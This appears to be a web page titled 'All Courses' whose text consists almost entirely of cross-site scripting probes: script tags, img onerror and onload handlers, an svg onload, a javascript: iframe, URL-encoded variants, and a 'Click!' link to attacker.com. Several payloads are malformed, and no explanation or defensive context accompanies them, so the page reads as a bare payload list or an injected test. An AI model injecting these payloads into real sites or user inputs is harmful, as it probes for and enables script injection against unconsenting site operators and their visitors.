All Courses
%3cscript%3ealert(1)%3c%2fscript%3e %3cimg%20src%3dx%20onerror%3dalert(1)%3e Click!
<script>alert(1)</script>
%3cscript%3ealert(1)%3c%2fscript%3e
<img src=x onload(alert(1))>
<img src=x onerror(alert(1))>
%3cimg%20src%3dx%20onerror%3dalert(1)%3e
<svg onload=alert(1)>
<iframe src=”javascript:alert(1)”></iframe>
<img src=q onerror=prompt(8)>
<img src=xss onerror=alert(1)><a href="http://attacker.com">Click!</a>